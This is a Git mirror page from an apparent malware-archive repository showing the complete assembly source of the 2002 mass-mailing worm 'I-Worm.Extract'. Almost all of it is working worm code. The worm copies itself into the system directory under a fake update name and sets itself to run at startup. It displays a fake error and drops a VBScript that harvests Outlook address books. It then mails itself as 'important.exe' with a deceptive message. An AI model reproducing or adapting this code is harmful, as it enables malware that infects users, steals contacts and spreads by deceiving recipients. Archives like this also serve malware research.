ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
9828f6f207
MalwareSourceCode/Win32/InternetWorm/I-Worm.Extract.asm

480 lines
8.7 KiB
NASM
Raw Normal View History

Add files via upload
2020-10-10 03:25:52 +00:00
comment #
Name : I-Worm.Extract
Author : PetiK
Date : February 3rd 2002 - February 4th 2002
Size : 5632
Action :
#
.586p
.model flat
.code
JUMPS
api macro a
extrn a:proc
call a
endm
include Useful.inc
include myinclude.inc
start_worm:
@pushsz "KERNEL32.DLL"
api GetModuleHandleA
xchg eax,ebx
kern macro x
push offset sz&x
push ebx
api GetProcAddress
mov _ptk&x,eax
endm
kern CloseHandle
kern CopyFileA
kern CreateDirectoryA
kern CreateFileA
kern CreateFileMappingA
kern DeleteFileA
kern GetDateFormatA
kern GetFileSize
kern GetModuleFileNameA
kern GetSystemDirectoryA
kern GetSystemTime
kern GetTimeFormatA
kern GetWindowsDirectoryA
kern lstrcat
kern lstrcmp
kern lstrcpy
kern lstrlen
kern MapViewOfFile
kern SetCurrentDirectoryA
kern Sleep
kern UnmapViewOfFile
kern WinExec
kern WriteFile
kern WriteProfileStringA
kern WritePrivateProfileStringA
push 50
mov esi,offset orig_worm
push esi
push 0
call _ptkGetModuleFileNameA
push 50
push offset verif_worm
call _ptkGetSystemDirectoryA
@pushsz "\UPDATEW32.EXE"
push offset verif_worm
call _ptklstrcat
push esi
push offset verif_worm
call _ptklstrcmp
test eax,eax
jz continue_worm
mov edi,offset copy_worm
push edi
push 50
push edi
call _ptkGetSystemDirectoryA
add edi,eax
mov eax,"dpU\"
stosd
mov eax,"Weta"
stosd
mov eax,"e.23"
stosd
mov eax,"ex"
stosd
pop edi
copy_w: push 0
push edi
push esi
call _ptkCopyFileA
run_w: push edi
@pushsz "RUN"
@pushsz "WINDOWS"
call _ptkWriteProfileStringA
call CreateDate
push 50
push offset realname
push offset orig_worm
api GetFileTitleA
@pushsz " - "
push offset date
call _ptklstrcat
push offset realname
push offset date
call _ptklstrcat
f_mess: push 10h
push offset date
call @mess
db "Cannot Open this File !",CRLF,CRLF
db "If you downloaded this file, try downloading again.",0
@mess:
push 0
api MessageBoxA
jmp end_worm
continue_worm:
push 50
push offset vbsfile
call _ptkGetWindowsDirectoryA
@pushsz "\ExtractVbs.vbs"
push offset vbsfile
call _ptklstrcat
push 0
push 20h
push 2
push 0
push 1
push 40000000h
push offset vbsfile
call _ptkCreateFileA
xchg eax,ebx
push 0
push offset octets
push e_vbs - s_vbs
push offset s_vbs
push ebx
call _ptkWriteFile
push ebx
call _ptkCloseHandle
push offset vbsfile
push offset vbsexec
call _ptklstrcpy
push 4
push offset execcontrol
call _ptkWinExec
push 5000
call _ptkSleep
push offset vbsfile
call _ptkDeleteFileA
payload:
push offset Systime
call _ptkGetSystemTime
cmp [Systime.wDay],29
jne end_pay
push 40h
@pushsz "I-Worm.Extract"
call e_mess
db "Hi man, you received my worm !",CRLF
db "Don't panic, it doesn't format your computer",CRLF,CRLF
db 9,"Bye and Have a Nice Day.",0
e_mess:
push 0
api MessageBoxA
end_pay:
sh_gsf: push 0
push 5
push offset progra
push 0
api SHGetSpecialFolderPathA
push offset progra
call _ptkSetCurrentDirectoryA
@pushsz "Update Windows 32bits"
call _ptkCreateDirectoryA
@pushsz "\Update Windows 32bits"
push offset progra
call _ptklstrcat
push offset progra
call _ptkSetCurrentDirectoryA
push 0
@pushsz "MAJ.exe"
push offset orig_worm
call _ptkCopyFileA
verif_inet:
push 0
push offset inet
api InternetGetConnectedState
dec eax
jnz verif_inet
push 50
push offset winpath
call _ptkGetWindowsDirectoryA
push offset winpath
call _ptkSetCurrentDirectoryA
spread: pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
@pushsz "Outlook_Addr.txt"
call _ptkCreateFileA
inc eax
je end_spread
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
call _ptkCreateFileMappingA
test eax,eax
je end_s1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
call _ptkMapViewOfFile
test eax,eax
je end_s2
xchg eax,esi
push 0
push ebx
call _ptkGetFileSize
cmp eax,4
jbe end_s3
scan_mail:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,";"
je end_m
cmp al,"#"
je f_mail
cmp al,'@'
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
end_m: xor al,al
stosb
pop edi
test edx,edx
je scan_mail
call send_mail
jmp scan_mail
f_mail:
end_s3: push esi
call _ptkUnmapViewOfFile
end_s2: push ebp
call _ptkCloseHandle
end_s1: push ebx
call _ptkCloseHandle
end_spread: popad
end_worm:
push 0
api ExitProcess
send_mail:
call CreateDate
call CreateTime
@pushsz "C:\liste.ini"
push offset mail_addr
push offset time
push offset date
call _ptkWritePrivateProfileStringA
xor eax,eax
push eax
push eax
push offset Message
push eax
push [sess]
api MAPISendMail
ret
CreateDate Proc
pushad
mov edi,offset date
push 32
push edi
@pushsz "dddd, dd MMMM yyyy"
push 0
push 0
push 9
call _ptkGetDateFormatA
popad
ret
CreateDate EndP
CreateTime Proc
pushad
mov edi,offset time
push 32
push edi
@pushsz "HH:mm:ss"
push 0
push 0
push 9
call _ptkGetTimeFormatA
popad
ret
CreateTime EndP
.data
copy_worm db 50 dup (0)
orig_worm db 50 dup (0)
verif_worm db 50 dup (0)
vbsfile db 50 dup (0)
winpath db 50 dup (0)
progra db 50 dup (0)
mail_addr db 128 dup (?)
realname db 50 dup (0)
date db 30 dup (?)
time db 9 dup (?)
octets dd ?
inet dd 0
sess dd 0
subject db "Re: Check This...",0
body db "Hi",CRLF
db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF
db 9,"Best Regards",CRLF,CRLF,CRLF
db "Salut,",CRLF
db "Voici le fichier que tu cherches. Ouvre vite ! C'est tr<74>s important",CRLF,CRLF
db 9,"Mes sinc<6E>res salutations",0
filename db "important.exe",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset filename
dd ?
szCloseHandle db "CloseHandle",0
szCopyFileA db "CopyFileA",0
szCreateDirectoryA db "CreateDirectoryA",0
szCreateFileA db "CreateFileA",0
szCreateFileMappingA db "CreateFileMappingA",0
szDeleteFileA db "DeleteFileA",0
szGetDateFormatA db "GetDateFormatA",0
szGetFileSize db "GetFileSize",0
szGetModuleFileNameA db "GetModuleFileNameA",0
szGetSystemDirectoryA db "GetSystemDirectoryA",0
szGetSystemTime db "GetSystemTime",0
szGetTimeFormatA db "GetTimeFormatA",0
szGetWindowsDirectoryA db "GetWindowsDirectoryA",0
szlstrcat db "lstrcat",0
szlstrcmp db "lstrcmp",0
szlstrcpy db "lstrcpy",0
szlstrlen db "lstrlen",0
szMapViewOfFile db "MapViewOfFile",0
szSetCurrentDirectoryA db "SetCurrentDirectoryA",0
szSleep db "Sleep",0
szUnmapViewOfFile db "UnmapViewOfFile",0
szWinExec db "WinExec",0
szWriteFile db "WriteFile",0
szWritePrivateProfileStringA db "WritePrivateProfileStringA",0
szWriteProfileStringA db "WriteProfileStringA",0
_ptkCloseHandle dd ?
_ptkCopyFileA dd ?
_ptkCreateDirectoryA dd ?
_ptkCreateFileA dd ?
_ptkCreateFileMappingA dd ?
_ptkDeleteFileA dd ?
_ptkGetDateFormatA dd ?
_ptkGetFileSize dd ?
_ptkGetModuleFileNameA dd ?
_ptkGetSystemDirectoryA dd ?
_ptkGetSystemTime dd ?
_ptkGetTimeFormatA dd ?
_ptkGetWindowsDirectoryA dd ?
_ptklstrcat dd ?
_ptklstrcmp dd ?
_ptklstrcpy dd ?
_ptklstrlen dd ?
_ptkMapViewOfFile dd ?
_ptkSetCurrentDirectoryA dd ?
_ptkSleep dd ?
_ptkUnmapViewOfFile dd ?
_ptkWinExec dd ?
_ptkWriteFile dd ?
_ptkWriteProfileStringA dd ?
_ptkWritePrivateProfileStringA dd ?
s_vbs: db 'On Error Resume Next',CRLF
db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF
db 'Set win=f.GetSpecialFolder(0)',CRLF
db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF
db 'c.Close',CRLF
db 'Set out=CreateObject("Outlook.Application")',CRLF
db 'Set mapi=out.GetNameSpace("MAPI")',CRLF
db 'adr="extractcounter@multimania.com"',CRLF
db 'For Each mail in mapi.AddressLists',CRLF
db 'If mail.AddressEntries.Count <> 0 Then',CRLF
db 'For O=1 To mail.AddressEntries.Count',CRLF
db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF
db 'Next',CRLF
db 'End If',CRLF
db 'Next',CRLF
db 'adr=adr &";#"',CRLF,CRLF
db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF
db 'c.WriteLine adr',CRLF
db 'c.Close',CRLF
e_vbs:
execcontrol db "wscript "
vbsexec db 50 dup (0)
db "",0
end start_worm
end
Reference in New Issue Copy Permalink